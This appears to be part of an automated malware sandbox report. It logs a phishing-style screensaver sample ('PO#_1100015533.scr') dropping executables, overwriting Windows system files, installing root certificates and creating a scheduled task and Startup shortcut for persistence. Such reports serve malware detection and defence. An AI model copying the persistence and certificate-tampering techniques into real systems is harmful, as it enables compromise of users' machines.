                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msdtc.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
                  Installs new ROOT certificates
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile created: C:\Users\user\AppData\Roaming\hVVSnrrP.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\ehome\ehsched.exeJump to dropped file
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile created: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exeJump to dropped file
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile created: C:\Windows\System32\alg.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\ehome\ehrecvr.exeJump to dropped file
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile created: C:\Users\user\AppData\Local\Temp\Microsofts.exeJump to dropped file
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\dllhost.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\ieetwcollector.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\sppsvc.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXEJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\ehome\ehsched.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile created: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeJump to dropped file
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile created: C:\Windows\System32\alg.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\ehome\ehrecvr.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\sppsvc.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\dllhost.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\ieetwcollector.exeJump to dropped file
                  Source: C:\Windows\System32\msdtc.exeFile created: C:\Windows\DtcInstall.log

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp"
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ASP.NET_4.0.30319\Names
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Creates files inside the volume driver (system volume information)
                  Source: C:\Windows\System32\wbengine.exeFile created: C:\System Volume Information\WindowsImageBackup
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
